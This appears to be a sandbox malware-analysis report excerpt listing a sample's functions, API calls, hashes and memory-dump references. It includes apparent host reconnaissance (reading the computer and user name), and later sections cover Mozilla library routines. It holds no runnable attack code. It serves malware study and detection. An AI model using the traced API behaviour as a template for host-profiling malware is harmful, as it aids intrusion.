Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 22579ed1f27de8cd9158636a53769edea1dc48a083a98a0f99b789c2c8a0d277
Instruction ID: f18a0cf1d4c2a0f6746f87797c4a0f2d8dccbfe228b3d6e54feec3973bd4505a
Opcode Fuzzy Hash: 22579ed1f27de8cd9158636a53769edea1dc48a083a98a0f99b789c2c8a0d277
Instruction Fuzzy Hash: C4F0E271641208BBEB14AAA4AC4AFBAB7E8E705B19F300458F904E3280D5719E54CAA9

Function 00268D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00251B54,?,?,0027564C,?,?,00270E1F), ref: 00268D9F

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 27997673fbc39f3c5aad21855f76bd5220985dfed96cd5a833ff978e4c69d776
Instruction ID: db51d840e525bd098058737b3e9b3dec3728cc558496d5bf77d772d458448787
Opcode Fuzzy Hash: 27997673fbc39f3c5aad21855f76bd5220985dfed96cd5a833ff978e4c69d776
Instruction Fuzzy Hash: 6DF0A574C10208EBCB04EFA4D54A6ECBB74EB10310F1082AAE866672D0DB749AA5DF91

Function 00268DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00268E0B

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: eb50964c52ef8d99e343df12b40bff61a4576a5666bb4801765820142f473e95
Instruction ID: 96d79ea9a1a2abafd616020d708de8958b472071aa7ebef73bcb42247aa2ea96
Opcode Fuzzy Hash: eb50964c52ef8d99e343df12b40bff61a4576a5666bb4801765820142f473e95
Instruction Fuzzy Hash: 4BE01A31A4034C6BDB91EB90CC96FAE737CDB44B01F004295BA0C5A1C0DE70AB968F91

Function 00251190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 002678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267910
Part of subcall function 002678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00267917
Part of subcall function 002678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0026792F

Part of subcall function 00267850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002511B7), ref: 00267880
Part of subcall function 00267850: RtlAllocateHeap.NTDLL(00000000), ref: 00267887
Part of subcall function 00267850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0026789F

ExitProcess.KERNEL32 ref: 002511C6

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 99b4f4ea060ce2639436240c2dee5e17b8194cea5bae53500c72035520ca768f
Instruction ID: ab0c4318fd12b77008b422b8e683f0a8a70bc315c2e730957860b41676894088
Opcode Fuzzy Hash: 99b4f4ea060ce2639436240c2dee5e17b8194cea5bae53500c72035520ca768f
Instruction Fuzzy Hash: 2EE0ECB593420253DA0077F0BC0AB2A329C5B2434EF040975BE09D2102FA25EC7499AE

Non-executed Functions

Function 6C5C5440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C5C5492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5C54A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5C54BE
__Init_thread_footer.LIBCMT ref: 6C5C54DB

Part of subcall function 6C5EAB3F: EnterCriticalSection.KERNEL32(6C63E370,?,?,6C5B3527,6C63F6CC,?,?,?,?,?,?,?,?,6C5B3284), ref: 6C5EAB49
Part of subcall function 6C5EAB3F: LeaveCriticalSection.KERNEL32(6C63E370,?,6C5B3527,6C63F6CC,?,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5EAB7C

Part of subcall function 6C5ECBE8: GetCurrentProcess.KERNEL32(?,6C5B31A7), ref: 6C5ECBF1
Part of subcall function 6C5ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5B31A7), ref: 6C5ECBFA

GetCurrentThreadId.KERNEL32 ref: 6C5C54F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C5C5516
GetCurrentThreadId.KERNEL32 ref: 6C5C556A
AcquireSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5C5577
moz_xmalloc.MOZGLUE(00000070), ref: 6C5C5585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C5C5590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C5C55E6
ReleaseSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5C5606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5C5616

Part of subcall function 6C5EAB89: EnterCriticalSection.KERNEL32(6C63E370,?,?,?,6C5B34DE,6C63F6CC,?,?,?,?,?,?,?,6C5B3284), ref: 6C5EAB94
Part of subcall function 6C5EAB89: LeaveCriticalSection.KERNEL32(6C63E370,?,6C5B34DE,6C63F6CC,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5EABD1

GetCurrentThreadId.KERNEL32 ref: 6C5C563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5C5646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C5C567C
free.MOZGLUE(?), ref: 6C5C56AE

Part of subcall function 6C5D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5D5EDB
Part of subcall function 6C5D5E90: memset.VCRUNTIME140(ewal,000000E5,?), ref: 6C5D5F27
Part of subcall function 6C5D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5D5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C5C56E8
GetCurrentThreadId.KERNEL32 ref: 6C5C5707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C5C570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C5C5729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C5C574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C5C576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C5C5796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C5C57B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C5C57CA

Strings

MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C5C5766
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C5C548D
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C5C5724
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C5C5CF9
[I %d/%d] profiler_init, xrefs: 6C5C564E
GeckoMain, xrefs: 6C5C5554, 6C5C55D5
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C5C5749
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C5C54B9
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C5C5D24
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C5C5D1C
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C5C5C56
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C5C5B38
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C5C56E3
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C5C584E
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C5C5AC9
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C5C57AE
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C5C5D01
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C5C57C5
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C5C5BBE
MOZ_BASE_PROFILER_HELP, xrefs: 6C5C5511
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C5C54A3
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C5C5791
MOZ_PROFILER_STARTUP, xrefs: 6C5C55E1
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C5C5D2B
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C5C5717

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 2583415a421061b2ef55bdfb2509577bb31d2b63b6c2f0885597910ee4085718
Instruction ID: b773030e45deba943012d0038f211507cf38b466f60a856c61f3067812d0b453
Opcode Fuzzy Hash: 2583415a421061b2ef55bdfb2509577bb31d2b63b6c2f0885597910ee4085718
Instruction Fuzzy Hash: 79222471A047509FD7109FE58C8865A7BB4EF86348F802A2DF84A87A41EB35D849CF5B

Function 6C5C6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C5C6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C5C6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C5C6D26

Part of subcall function 6C5CCA10: malloc.MOZGLUE(?), ref: 6C5CCA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C5C6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C5C6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C5C6D73
free.MOZGLUE(00000000), ref: 6C5C6D80
CertGetNameStringW.CRYPT32 ref: 6C5C6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C5C6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5C6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C5C6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C5C6E10
CryptMsgClose.CRYPT32(00000000), ref: 6C5C6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C5C6E34
CreateFileW.KERNEL32 ref: 6C5C6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C5C6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5C6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C5C709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C5C7103
free.MOZGLUE(00000000), ref: 6C5C7153
CloseHandle.KERNEL32(?), ref: 6C5C7176
__Init_thread_footer.LIBCMT ref: 6C5C7209
__Init_thread_footer.LIBCMT ref: 6C5C723A
__Init_thread_footer.LIBCMT ref: 6C5C726B
__Init_thread_footer.LIBCMT ref: 6C5C729C
__Init_thread_footer.LIBCMT ref: 6C5C72DC
__Init_thread_footer.LIBCMT ref: 6C5C730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C5C73C2
VerSetConditionMask.NTDLL ref: 6C5C73F3
VerSetConditionMask.NTDLL ref: 6C5C73FF
VerSetConditionMask.NTDLL ref: 6C5C7406
VerSetConditionMask.NTDLL ref: 6C5C740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C5C741A
moz_xmalloc.MOZGLUE(?), ref: 6C5C755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5C7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C5C7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C5C7598
free.MOZGLUE(00000000), ref: 6C5C75AC

Part of subcall function 6C5EAB89: EnterCriticalSection.KERNEL32(6C63E370,?,?,?,6C5B34DE,6C63F6CC,?,?,?,?,?,?,?,6C5B3284), ref: 6C5EAB94
Part of subcall function 6C5EAB89: LeaveCriticalSection.KERNEL32(6C63E370,?,6C5B34DE,6C63F6CC,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5EABD1

Strings

CryptCATAdminReleaseCatalogContext, xrefs: 6C5C72C8
(, xrefs: 6C5C768A
SHA256, xrefs: 6C5C6EC0
wintrust.dll, xrefs: 6C5C72CD

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 7d885875439749df5275e147a0432618b1d026908884db9d3e1664a94ac99990
Instruction ID: 1b4b60d3c53ab30bd4cc51481e955bb469fdb5a0297ce92699bc2d2f92795a7e
Opcode Fuzzy Hash: 7d885875439749df5275e147a0432618b1d026908884db9d3e1664a94ac99990
Instruction Fuzzy Hash: 1052C4B1A003149BEB21DF65CC84BAA77B8EF86708F10559DE90D97A40DB70AF84CF56

Function 6C5F0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C5F0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C5F0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C5F0FB7
EnterCriticalSection.KERNEL32(?), ref: 6C5F0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C5F1031
LeaveCriticalSection.KERNEL32(?), ref: 6C5F10D0
EnterCriticalSection.KERNEL32(?), ref: 6C5F117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C5F1C39
EnterCriticalSection.KERNEL32(6C63E744), ref: 6C5F3391
LeaveCriticalSection.KERNEL32(6C63E744), ref: 6C5F33CD
LeaveCriticalSection.KERNEL32(?), ref: 6C5F3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5F3437

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5F3559, 6C5F382D, 6C5F3848
Compile-time page size does not divide the runtime one., xrefs: 6C5F3946
<jemalloc>, xrefs: 6C5F3941, 6C5F39F1
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C5F37A8
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C5F37BD
MALLOC_OPTIONS, xrefs: 6C5F35FE
: (malloc) Unsupported character in malloc options: ', xrefs: 6C5F3A02
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C5F37D2
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C5F3793
MOZ_CRASH(), xrefs: 6C5F3950

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 9da1f367667a395731cd7cdc7e5064934f0bb12a77fa944c8b6b33d475e0a09c
Instruction ID: 32161161a6c31e69b0b4e92e4125c4107646ea2632742397b9431c96d4c36fb7
Opcode Fuzzy Hash: 9da1f367667a395731cd7cdc7e5064934f0bb12a77fa944c8b6b33d475e0a09c
Instruction Fuzzy Hash: AA537CB1A057418FD708CF29C940616BBE1BF89328F29C66DE8799B791D771E842CF81

Function 6C6134A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C61355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6135BC
